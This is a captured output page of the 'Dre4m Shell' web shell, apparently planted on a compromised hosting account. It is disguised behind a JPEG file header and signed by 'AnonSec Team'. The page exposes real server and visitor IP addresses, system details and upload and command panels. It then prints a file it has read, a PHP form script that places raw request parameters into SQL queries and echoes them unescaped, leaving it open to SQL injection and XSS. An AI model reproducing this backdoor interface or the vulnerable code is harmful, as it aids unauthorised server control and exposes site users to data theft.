ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/lespotdulinge.fr/seo-mailing/users/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/lespotdulinge.fr/seo-mailing/users/feature_edit.php
<?php
if(count($_POST)){
	 $query = "UPDATE ".$INFO['sql_tbl_prefix']."mail_user_feature SET name = '{$_POST['name']}' WHERE id = {$_POST['id']} LIMIT 1 "; 
	mysqli_query($db,$query) or exit("insert error" . mysqli_error()."<br>".$query);?>
    	<script type="application/javascript">
			document.location.href="?users_feature";
		</script> 
<?php } ?>
<?php $query = "SELECT * FROM ".$INFO['sql_tbl_prefix']."mail_user_feature WHERE id = {$_GET['feature_edit']} LIMIT 1";
		 $result = mysqli_query($db,$query) or exit("select advice error");
		 $feature = mysqli_fetch_array($result); ?>
<form action="" method="post" class="form-horizontal">
<h3><?php echo __('Edit Feature');?></h3>
<input type="hidden" name="id" value="<?php echo $_GET['feature_edit']?>">
<div class="control-group">
	<label class="control-label" for="name"><?php echo __('Name');?></label>
	<div class="controls">
    <input type="text" name="name" value="<?php echo $feature['name']?>">
    </div>
</div>
	<div class="form-actions">
        <button type="submit" class="btn btn-primary"><?php echo __('Save');?></button>
    </div>
</form>

Anon7 - 2022
AnonSec Team